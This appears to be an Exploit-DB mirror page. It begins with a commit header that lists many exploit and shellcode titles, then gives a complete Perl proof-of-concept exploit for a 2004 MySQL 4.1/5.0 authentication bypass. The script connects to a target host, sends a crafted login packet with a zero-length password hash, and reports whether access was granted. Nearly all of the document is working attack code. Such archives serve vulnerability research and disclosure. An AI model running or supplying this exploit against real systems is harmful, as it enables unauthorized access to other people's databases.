exploit-db-mirror/exploits/multiple/remote/24250.pl
Offensive Security 880bbe402e DB: 2019-03-08
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

147 lines
No EOL
3.6 KiB
Perl
Executable file

source: https://www.securityfocus.com/bid/10654/info
MySQL is prone to a vulnerability that may permit remote clients to bypass authentication.
This is due to a logic error in the server when handling client-supplied length values for password strings.
Successful exploitation will yield unauthorized access to the database.
This issue is known to exist in MySQL 4.1 releases prior to 4.1.3 and MySQL 5.0.
#!/usr/bin/perl
#
# The script connects to MySQL and attempts to log in using a zero-length password
# Based on the vuln found by NGSSecurity
#
# Exploit copyright (c) 2004 by Eli Kara, Beyond Security
# <elik@beyondsecurity.com>
#
use strict;
use IO::Socket::INET;
usage() unless ((@ARGV >= 1) || (@ARGV <= 3));
my $username = shift(@ARGV);
my $host = shift(@ARGV);
if (!$host)
{
usage();
}
my $port = shift(@ARGV);
if (!$port)
{
$port = 3306; print "Using default MySQL port (3306)\n";
}
# create the socket
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
# receive greeting
my $reply;
recv($socket, $reply, 1024, 0);
if (length($reply) < 7)
{
print "Not allowed to connect to MySQL!\n";
exit(1);
}
print "Received greeting:\n";
HexDump($reply);
print "\n";
# here we define the login OK reply
# my $login_ok = "\x01\x00\x00\x02\xFE";
# break the username string into chars and rebuild it
my $binuser = pack("C*", unpack("C*", $username));
# send login caps packet with password
my $packet = "\x85\xa6".
"\x03\x00\x00".
"\x00".
"\x00\x01\x08\x00\x00\x00". # capabilities, max packet, etc..
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00".$binuser."\x00\x14\x00\x00\x00\x00". # username and pword hash length + NULL hash
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; # continue NULL hash
substr($packet, 0, 0) = pack("C1", length($packet)) . "\x00\x00\x01"; # MySQL message length + packet number (1)
print "Sending caps packet:\n";
HexDump($packet);
print "\n";
send $socket, $packet, 0;
# receive reply
recv($socket, $reply, 1024, 0);
print "Received reply:\n";
HexDump($reply);
my @list_bytes = unpack("C*", $reply);
#print "The fifth byte is: ", $list_bytes[4], "\n";
if (length(@list_bytes) >= 4)
{
print "Response insufficent\n";
}
#if ($reply eq $login_ok)
if ($list_bytes[4] == 0 || $list_bytes[4] == 254)
{
print "Received OK reply, authentication successful!!\n";
}
else
{
print "Authentication failed!\n";
}
# close
close($socket);
sub usage
{
# print usage information
print "\nUsage: mysql_auth_bypass_zeropass.pl <username> <host> [port]\n
<username> - The DB username to authenticate as
<host> - The host to connect to
[port] - The TCP port which MySQL is listening on (optional, default is 3306)\n\n";
exit(1);
}
###
# do a hexdump of a string (assuming it's binary)
###
sub HexDump
{
my $buffer = $_[0];
# unpack it into chars
my @up = unpack("C*", $buffer);
my $pos=0;
# calculate matrix sizes
my $rows = int(@up/16);
my $leftover = int(@up%16);
for( my $row=0; $row < $rows ; $row++, $pos+=16)
{
printf("%08X\t", $pos);
my @values = @up[$pos .. $pos+15];
my @line;
foreach my $val (@values)
{
push(@line, sprintf("%02X", $val));
}
print join(' ', @line), "\n";
}
# print last line
printf("%08X\t", $pos);
my @values = @up[$pos .. $pos+$leftover-1];
my @line;
foreach my $val (@values)
{
push(@line, sprintf("%02X", $val));
}
print join(' ', @line), "\n";
}